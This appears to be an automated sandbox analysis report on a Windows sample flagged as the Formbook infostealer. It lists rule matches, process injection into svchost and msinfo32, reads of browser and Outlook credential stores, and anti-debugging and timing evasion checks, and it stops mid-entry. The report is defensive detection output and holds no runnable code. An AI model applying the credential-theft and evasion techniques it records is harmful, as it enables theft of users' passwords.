Source: 00000006.00000002.3510761457.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3510881092.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3508276953.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3517475959.0000000007380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2024042787.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@10/7

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_0033A2D5 GetLastError,FormatMessageW,

0_2_0033A2D5

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00328713 AdjustTokenPrivileges,CloseHandle,		0_2_00328713
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00328CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00328CC3

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_0033B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0033B59E

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_0034F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0034F121

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_002D4FE9 FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_002D4FE9

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

File created: C:\Users\user\AppData\Local\Temp\aut207F.tmp

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msinfo32.exe, 00000006.00000002.3508575793.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000003.2338408956.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3508575793.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 6ddrUd6iQo.exe	Virustotal: Detection: 67%
Source: 6ddrUd6iQo.exe	ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Users\user\Desktop\6ddrUd6iQo.exe "C:\Users\user\Desktop\6ddrUd6iQo.exe"
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\6ddrUd6iQo.exe"
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
Source: C:\Windows\SysWOW64\msinfo32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\6ddrUd6iQo.exe"	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\msinfo32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\msinfo32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: msinfo32.pdb source: svchost.exe, 00000001.00000003.1991673344.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1991814500.000000000306D000.00000004.00000020.00020000.00000000.sdmp, wEnggOkwNlJAef.exe, 00000005.00000003.1962939041.00000000007FB000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wEnggOkwNlJAef.exe, 00000005.00000000.1945157195.0000000000C1E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: 6ddrUd6iQo.exe, 00000000.00000003.1658586506.0000000004390000.00000004.00001000.00020000.00000000.sdmp, 6ddrUd6iQo.exe, 00000000.00000003.1660777950.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2024475537.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2024475537.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1791548848.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1801526478.0000000003600000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3511277033.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000003.2033794892.0000000004A83000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000003.2024842442.00000000048D7000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3511277033.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 6ddrUd6iQo.exe, 00000000.00000003.1658586506.0000000004390000.00000004.00001000.00020000.00000000.sdmp, 6ddrUd6iQo.exe, 00000000.00000003.1660777950.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2024475537.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2024475537.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1791548848.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1801526478.0000000003600000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, msinfo32.exe, 00000006.00000002.3511277033.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000003.2033794892.0000000004A83000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000003.2024842442.00000000048D7000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3511277033.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000004F4C000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3508575793.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.000000000525C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2494932075.00000000011EC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000004F4C000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3508575793.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.000000000525C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2494932075.00000000011EC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: msinfo32.pdbGCTL source: svchost.exe, 00000001.00000003.1991673344.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1991814500.000000000306D000.00000004.00000020.00020000.00000000.sdmp, wEnggOkwNlJAef.exe, 00000005.00000003.1962939041.00000000007FB000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00404090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_00404090

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00338719 push FFFFFF8Bh; iretd	0_2_0033871B
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002FE94F push edi; ret	0_2_002FE951
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002FEA68 push esi; ret	0_2_002FEA6A
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002F8B85 push ecx; ret	0_2_002F8B98
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002FEC43 push esi; ret	0_2_002FEC45
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002FED2C push edi; ret	0_2_002FED2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414079 push ecx; iretd	1_2_004140FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418839 push BF5538DEh; iretd	1_2_0041883E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040C1F7 push ebx; ret	1_2_0040C1FA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041AAD8 pushfd ; ret	1_2_0041AAF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411AF6 push esp; retf	1_2_00411AF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417378 push ds; iretd	1_2_0041737F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041F3E0 push ebp; ret	1_2_0041F3E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411C7E push ss; retf	1_2_00411C92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411CC9 push ss; retf	1_2_00411C92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004184CC push edx; iretd	1_2_004184CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040ACF0 pushad ; ret	1_2_0040ACF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414480 push ebp; iretd	1_2_00414481
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411C83 push ss; retf	1_2_00411C92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004174A8 push esi; retf	1_2_004174AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403560 push eax; ret	1_2_00403562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401DBD push es; retf	1_2_00401DBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040AE14 push edi; retf	1_2_0040AE15
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx	1_2_038309B6
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_04260551 push BF5538DEh; iretd	5_2_04260556
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_04253F0F push ebx; ret	5_2_04253F12
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_042627F0 pushfd ; ret	5_2_04262809
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_0425980E push esp; retf	5_2_04259811
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_0425F090 push ds; iretd	5_2_0425F097
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_042670F8 push ebp; ret	5_2_04267100
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_04259996 push ss; retf	5_2_042599AA

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_002D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_002D4A35
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_003555FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_003555FD

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_002F33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_002F33C7

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	API/Special instruction interceptor: Address: 18F3234
Source: C:\Windows\SysWOW64\msinfo32.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\msinfo32.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\msinfo32.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\msinfo32.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\msinfo32.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\msinfo32.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\msinfo32.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\msinfo32.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0387096E rdtsc

1_2_0387096E

Source: C:\Windows\SysWOW64\msinfo32.exe	Window / User API: threadDelayed 2906			Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Window / User API: threadDelayed 7066			Jump to behavior

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-98875

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	API coverage: 4.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\msinfo32.exe	API coverage: 2.6 %

Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe TID: 1908	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 2412	Thread sleep count: 2906 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 2412	Thread sleep time: -5812000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 2412	Thread sleep count: 7066 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 2412	Thread sleep time: -14132000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msinfo32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msinfo32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00334696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00334696
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033C93C FindFirstFileW,FindClose,	0_2_0033C93C
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0033C9C7
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0033F200
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0033F35D
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0033F65E
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00333A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00333A2B
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_00333D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00333D4E
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_0033BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0033BF27
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C1C4C0 FindFirstFileW,FindNextFileW,FindClose,	6_2_02C1C4C0

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_002D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002D4AFE

Source: firefox.exe, 00000007.00000002.2496486772.000001B08113C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKKi
Source: wEnggOkwNlJAef.exe, 00000005.00000002.3509019969.00000000008AB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: msinfo32.exe, 00000006.00000002.3508575793.0000000002F60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	API call chain: ExitProcess graph end node	graph_0-97338
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	API call chain: ExitProcess graph end node	graph_0-97183
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	API call chain: ExitProcess graph end node	graph_0-97407

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0387096E rdtsc

1_2_0387096E

Source: C:\Windows\SysWOW64\svchost.exe

